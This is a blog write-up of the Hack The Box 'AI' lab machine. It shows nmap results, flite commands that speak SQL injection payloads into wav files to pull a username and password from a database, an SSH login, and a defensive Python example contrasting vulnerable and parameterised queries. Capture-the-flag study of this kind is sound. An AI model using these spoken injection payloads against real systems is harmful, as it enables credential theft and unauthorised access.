Hack The Box AI Machine Writeup – 10.10.10.163

Hello, here is the writeup of the Hack The Box AI machine, which is newly active. As usual I’m going to add the IP 10.10.10.163 to /etc/hosts as ai.htb for convenience.

Initial Nmap Scanning

➜  ai nmap -T4 -A -v ai.htb      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 20:04 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating Ping Scan at 20:04
Scanning ai.htb (10.10.10.163) [4 ports]
Completed Ping Scan at 20:04, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:04
Scanning ai.htb (10.10.10.163) [1000 ports]
Discovered open port 22/tcp on 10.10.10.163
Discovered open port 80/tcp on 10.10.10.163
Increasing send delay for 10.10.10.163 from 0 to 5 due to 290 out of 724 dropped probes since last increase.
Completed SYN Stealth Scan at 20:04, 9.04s elapsed (1000 total ports)
Initiating Service scan at 20:04
Scanning 2 services on ai.htb (10.10.10.163)
Completed Service scan at 20:04, 6.37s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against ai.htb (10.10.10.163)
Retrying OS detection (try #2) against ai.htb (10.10.10.163)
Retrying OS detection (try #3) against ai.htb (10.10.10.163)
Retrying OS detection (try #4) against ai.htb (10.10.10.163)
Retrying OS detection (try #5) against ai.htb (10.10.10.163)
Initiating Traceroute at 20:04
Completed Traceroute at 20:04, 0.20s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:04
Completed Parallel DNS resolution of 2 hosts. at 20:04, 0.77s elapsed
NSE: Script scanning 10.10.10.163.
Initiating NSE at 20:04
Completed NSE at 20:04, 6.17s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.67s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/11%OT=22%CT=1%CU=43569%PV=Y%DS=2%DC=T%G=Y%TM=5DC994
OS:BB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Uptime guess: 25.597 days (since Thu Oct 17 05:45:15 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   199.36 ms 10.10.14.1
2   167.95 ms ai.htb (10.10.10.163)

NSE: Script Post-scanning.
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds
           Raw packets sent: 1779 (82.330KB) | Rcvd: 1162 (74.241KB)

The Nmap scan revealed a couple of open ports: 80, a web server, and 22, SSH. Let’s investigate port 80 first.

Port 80 hosts a website called “Artificial Intelligence” with four links: Home, About, AI and Contact. The About page has a short introduction that says “Our developers working 24/7 to make it happen and we progressed well with audio conversion.”

The AI page has a file upload form, which is interesting; the Contact page has a fake email address for the machine’s maker, MrR3boot.

If you have rooted the machine Player, you will have come across the same situation: that machine also had you upload a wav file and pull information out of a vulnerable database. This AI machine is very similar to it.

Let’s exploit it

Getting User.txt

I’m going to use Flite to create a wav file, upload it using the upload form and get the credentials from the database. My command is:

➜  ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, username from users comment database"

The above command creates a wav file called nav1n.wav, which I’m going to upload using the upload form.

Well, I have the username “Alexa” now.

Let’s modify the command to get the password for the user Alexa.

➜  ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, password from users comment database"
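From a defender’s point of view, the whole trick above only works because the transcribed speech is spliced straight into a SQL string. The following is an added example, not code from the writeup or from the machine: it assumes the spoken phrase above is transcribed to the SQL fragment ' and 1 = 2 union select password from users -- (my reading of “open single quote” and “comment database”), uses a constructed in-memory SQLite database with placeholder rows, and shows the string-built lookup leaking the password while the parameterised lookup returns nothing.

```python
import re
import sqlite3

# What the speech-to-text stage is expected to hand the application for the
# spoken payload in the writeup (reconstructed, not captured from the box).
TRANSCRIBED_PAYLOAD = "' and 1 = 2 union select password from users -- "

# Constructed sample data; the password is a placeholder, not the real one.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('alexa', 'EXAMPLE_PASSWORD_NOT_REAL');
CREATE TABLE phrases (phrase TEXT);
INSERT INTO phrases VALUES ('hello ai');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, transcribed):
    """String-built query: whatever the recogniser heard becomes SQL."""
    query = f"SELECT phrase FROM phrases WHERE phrase = '{transcribed}'"
    return [row[0] for row in conn.execute(query)]


def lookup_hardened(conn, transcribed):
    """Bound parameter: the transcription is a value, never query text."""
    cur = conn.execute("SELECT phrase FROM phrases WHERE phrase = ?", (transcribed,))
    return [row[0] for row in cur]


# Quotes, comment markers and SQL keywords have no place in a phrase spoken
# to an audio assistant; flag them for logging and alerting. This is a
# detection aid on top of parameterisation, not a substitute for it.
SQL_MARKERS = re.compile(r"(?i)['\";]|--|\b(union|select|from)\b")


def suspicious_transcription(transcribed):
    return bool(SQL_MARKERS.search(transcribed))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, TRANSCRIBED_PAYLOAD))
    print("hardened:  ", lookup_hardened(db, TRANSCRIBED_PAYLOAD))
    print("flagged:   ", suspicious_transcription(TRANSCRIBED_PAYLOAD))
```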

As I already have the credentials, let’s check whether SSH works.

➜  ai ssh alexa@ai.htb
alexa@ai.htb's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.3.7-050307-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 11 17:49:45 UTC 2019

  System load:  0.06               Processes:           149
  Usage of /:   28.2% of 19.56GB   Users logged in:     0
  Memory usage: 27%                IP address for eth0: 10.10.10.163
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

63 packages can be updated.
15 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Nov 11 17:01:16 2019 from 10.10.14.35
alexa@AI:~$ 

Yesss, it works. Let’s see if I can find user.txt.

alexa@AI:~$ ls
user.txt
alexa@AI:~$ cat user.txt
c43b62[-----------]da55e4b
alexa@AI:~$ 

That’s it for today.

Navin

Hey there, I'm Navin, a passionate info-sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug bounty. If you are an HTB user and like my articles, please give respect here: Profile: https://www.hackthebox.eu/nav1n

Dover, Ben
10 months ago

you have really long nights at your place 🙂
